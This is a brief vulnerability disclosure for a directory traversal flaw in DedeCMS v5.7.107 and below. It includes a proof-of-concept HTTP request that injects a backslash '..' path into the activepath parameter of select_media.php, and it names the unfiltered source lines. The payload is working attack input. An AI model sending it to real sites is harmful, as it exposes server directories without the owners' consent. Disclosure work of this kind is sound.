dedecms-Directory-Traversal
DedeCMS v5.7.107 Directory Traversal
dedecms is a website building system. Its v5.7.107 and below have a directory traversal vulnerability. An attacker can traverse server directories
poc:
GET /include/dialog/select_media.php?f=&activepath=\uploads\media\..\..\..\..\ HTTP/1.1
Host: 192.168.1.103
Cookie: PHPSESSID=ggcnj9euppapcl74tjh59hqri6;
Connection: close
White box audit: Vulnerability location: include\dialog\select_media.php Lines 20 and 21 do not completely filter the parameters passed in by the user. If the system is windows, it can be bypassed

